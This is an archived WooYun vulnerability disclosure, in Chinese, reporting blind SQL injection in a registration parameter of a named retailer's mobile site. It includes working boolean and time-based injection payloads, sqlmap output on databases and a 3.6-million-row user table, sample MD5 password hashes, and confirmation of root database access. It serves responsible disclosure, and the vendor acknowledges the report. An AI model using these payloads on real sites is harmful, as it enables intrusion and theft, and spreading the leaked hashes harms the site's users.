乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-04-27: 细节已通知厂商并且等待厂商处理中 2014-04-28: 厂商已经确认,细节仅向厂商公开 2014-05-08: 细节向核心白帽子及相关领域专家公开 2014-05-18: 细节向普通白帽子公开 2014-05-28: 细节向实习白帽子公开 2014-06-11: 细节向公众公开
Thank You For Hearing Me - SinéAd O Connor ...
看到厂商活动第一个就是三福,就来逛逛。仅测试。看了下被报的貌似都是主站的,但愿没重复。
http://m.sanfu.com/reg/newCardPast.htm POS参数: user.curcusid=C7514492&user.verify=444554
order、union都不行...试试盲注
user.curcusid=C7514492' AND 2=2&user.verify=444554 (布尔类型注入,忘记先试单引号)
试了两次sleep从响应时间中得出有时间注入(多查询条件)
user.curcusid=C7514492' AND SLEEP(3) AnD 2='2&user.verify=444554
缓慢的响应时间告诉我不成...
Place: POSTParameter: user.curcusid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: user.curcusid=C7514492' AND 5870=5870 AND 'oDlZ'='oDlZ&user.verify=444554 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: user.curcusid=C7514492' AND SLEEP(5) AND 'jqcV'='jqcV&user.verify=444554
N多库
web application technology: Nginx, JSPback-end DBMS: MySQL 5.0.11available databases [5]:[*] c_sanfu[*] information_schema[*] mysql[*] test[*] wp
count一下eb_users
Database: c_sanfu+----------+---------+| Table | Entries |+----------+---------+| eb_users | 3642963 |+----------+---------+
透视了几个user
+-----------+-------------------------------------------+| user_rank | user_password |+-----------+-------------------------------------------+| 1 | e10adc3949ba59abbe56e057f20f883e || 1 | ae5df06521199dd833689b41ef43af9a || 1 | d437df002f7a5c8555c107af8a643977 || 1 | 0c039a038da81afefa8da3d3d1fd3c63 || 1 | 8ce1fa948dcedd72e2c83a37af7408e0 |+-----------+-------------------------------------------+
root权限
web application technology: Nginx, JSPback-end DBMS: MySQL >= 5.0.0[INFO] testing if current user is DBA[INFO] fetching current user[INFO] resumed: root@%current user is DBA: True
以上仅为测试,未带走丝毫数据,请知悉。
有礼物? 请速度修复且全面排查是否有shell迹象。
危害等级:高
漏洞Rank:18
确认时间:2014-04-28 08:44
感谢提交,修复中
暂无